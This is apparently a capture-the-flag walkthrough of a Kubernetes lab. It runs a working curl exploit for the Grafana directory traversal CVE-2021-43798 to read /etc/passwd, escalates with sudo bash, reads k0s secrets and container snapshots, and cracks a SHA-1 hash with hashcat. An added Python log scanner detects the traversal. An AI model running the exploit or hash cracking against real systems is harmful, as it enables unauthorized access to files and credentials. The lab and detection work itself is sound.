Task 1 - Access the cluster
Find the username
Launch an enumeration with nmap
nmap -sV -sC <ip> -v
We discover several open ports; let's access them to see what is behind each. Port 3000 serves Grafana, whose footer shows version 8.3.0. Port 5000 appears to be a JavaScript application. Let's explore the JavaScript application first. Look at the page source and the network trace. The page source references a CSS file. Inspect it to discover an interesting link to Pastebin. The content looks like a base64 string, so try decoding it. It is not valid base64; switch to base32 and decode again.
Here is the username.
Find the password
Launch an enumeration with nmap
nmap -sV -sC <ip> -v
We discover several open ports; let's access them to see what is behind each. Port 3000 serves Grafana, whose footer shows version 8.3.0. Port 5000 appears to be a JavaScript application. Let's follow the Grafana track by looking at the Exploit-DB website. There is a known vulnerability in this version that allows directory traversal (CVE-2021-43798). Read through the vulnerability details to reproduce it with curl:
curl http://<ip>:3000/public/plugins/alertlist/../../../../../../../../../../etc/passwd --path-as-is
--path-as-is tells curl not to handle sequences of /../ in the given URL path (check the man page).
Here is the password.
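From the defender's side, a request like the curl above leaves a recognizable trace in access logs. The following is an added example, not part of the original write-up: it flags requests to Grafana's /public/plugins/<id>/ route whose path climbs out of the plugin directory, including percent-encoded variants. The log format, function names and sample lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Static-file route for plugins, the one abused by CVE-2021-43798.
PLUGIN_ROUTE = re.compile(r"^/public/plugins/([^/]+)/(.*)$", re.S)
# Request field of a Common Log Format style line (assumed log format).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def normalize(path, rounds=3):
    """Percent-decode repeatedly so %2e%2e and double-encoded forms are seen."""
    for _ in range(rounds):
        path, prev = unquote(path), path
        if path == prev:
            break
    return path.replace("\\", "/")

def is_plugin_traversal(raw_path):
    """True if the path leaves the plugin directory through '..' segments."""
    path = normalize(raw_path.split("?", 1)[0])
    m = PLUGIN_ROUTE.match(path)
    if not m:
        return False
    depth = 0  # directory depth relative to the plugin's own folder
    for seg in m.group(2).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def scan(lines):
    """Return (line_number, path) for each log line with a traversal request."""
    found = ((n, REQUEST.search(line)) for n, line in enumerate(lines, 1))
    return [(n, m.group(1)) for n, m in found if m and is_plugin_traversal(m.group(1))]

# Constructed sample log lines (documentation addresses), not from a real server.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2022:10:00:00 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2022:10:00:05 +0000] "GET /public/plugins/alertlist/../../../../etc/passwd HTTP/1.1" 200 1801',
    '192.0.2.10 - - [01/Jan/2022:10:00:09 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 1801',
    '192.0.2.10 - - [01/Jan/2022:10:00:12 +0000] "GET /public/plugins/alertlist/img/../module.js HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A ".." that stays inside the plugin folder (the last sample line) is not flagged, which keeps the check from firing on harmless relative paths.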
Task 2 - Your secret crush
You can now SSH to the target machine with the previous username and password.
A simple sudo -l shows us that we can easily become root with
sudo bash
Then, check which processes are running on the server
ps -aux
If you look closely, you will see a k0s distribution running.
k0s kubectl get secret
Edit the secret to find a base64 string to decode.
Task 3 - Game of Pods
First, identify the pods running on the system with
k0s kubectl get pods -A
-A means to look in all namespaces.
A Google search shows us that pod data is stored under the /var/lib/k0s/containerd directory.
After some patience, we find the right directory, with a git folder inside: /var/lib/k0s/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/38/fs/home/ubuntu/jokes
git log
It allows us to check the last commit, and
git show <id>
lets us look at each commit. This one looks very interesting for answering the task.
git show 4b2c2d74b31d922252368c112a3907c5c1cf1ba3
Task 4 - Hack a job at FANG
intership is a pod name; let's enumerate the job to find a SHA-1 hash to crack with hashcat.
hashcat -m 100 -w 3 -D 1,2 26c3d1c068e7e01599c3612447410b5e56c779f1 rockyou.txt